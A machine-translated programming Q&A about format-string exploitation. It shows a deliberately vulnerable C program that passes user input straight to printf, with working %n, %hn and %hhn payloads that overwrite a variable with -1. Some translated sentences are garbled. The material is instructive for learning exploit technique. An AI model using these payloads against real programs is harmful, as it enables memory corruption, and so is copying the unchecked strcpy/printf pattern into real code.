字符串格式利用率：設置負值=「-1」使用％n

Question

我試圖使用Format String exploit來設置變量的值。我能夠使用修飾符％n通過字符串長度的值更改變量。

代碼

#include <stdio.h> 
#include <stdlib.h> 
int main(int argc, char *argv[]){ 
    char buffer[100]; 
    static int a=77; 
    strcpy(buffer, argv[1]); 
    printf(buffer); 
    printf("address a = 0x%08x, [0x%08x]\n", &a, a); 
    printf("a = %d\n", a); 
return 0; 
} 

./v4_2.out `printf "\xc4\x98\x04\x08"`%08x%08x%08x%08x%08x%08x%n 

address a = 0x080498c4, [0x00000034] 
a = 52 

我怎樣才能改變一個變量設置爲負值，例如， 「A = 1」 後？

P.S.我發現這可以用％u來完成。

Answer 1

只需使用linked article第一部分末尾描述的技巧即可。這包括分裂值-1（0xFFFFFFFFF）到下部和上部字（兩次0xFFFF）和這些分別寫入地址&a和(void*)(&a)+2：

./v4_2.out `printf "\xc4\x98\x04\x08\xc6\x98\x04\x08"`%65527x%7\$hn%8\$hn" 

解釋：

\xc4\x98\x04\x08 ... 0x080498c4, the address of a (lower two bytes) 
\xc6\x98\x04\x08 ... 0x080498c6, the address of a (upper two bytes) 
%65527x ... write 65527 extra bytes of garbage (eight have been written by now, so that makes 65535) 
%7\$hn ... write the number of characters so far (65535 = 0xFFFF) to lower word of a 
%8\$hn ... write the number of characters so far (65535 = 0xFFFF, it didn't change) to upper word of a 

數7來自您的上一個命令：

printf "\xc4\x98\x04\x08"`%08x%08x%08x%08x%08x%08x%n 
          1^ 2^ 3^ 4^ 5^ 6^7^ 

並且我存儲了一個更多的地址，以便堆疊一個t的位置8.

這仍然使很多輸出，你可以更進一步，並寫入0xFFFFFFFF逐字節。它應該是這樣的：比其他0xFFFFFFFF

\xc4\x98\x04\x08 ... 0x080498c4, the first (low) byte of a 
\xc5\x98\x04\x08 ... 0x080498c5, the second byte of a 
\xc6\x98\x04\x08 ... 0x080498c6, the third byte of a 
\xc7\x98\x04\x08 ... 0x080498c7, the fourth (high) byte of a 
%239x ... write 239 extra bytes of garbage (16 have been written by now, so that makes 255) 
%7\$hhn ... write the number of characters so far, as a byte (255 = 0xFF) to the first address above 
%8\$hhn ... the same for the second 
%9\$hhn ... the same for the third 
%10\$hhn ... the same for the last 

數字需要每個%hhn之間的一些額外的輸出。您需要計算它們之間輸出的垃圾字節數量，以彌補各自的差異。如果您需要低於之前的值，請使用僅寫入一個字節的事實，以便算術以256爲模。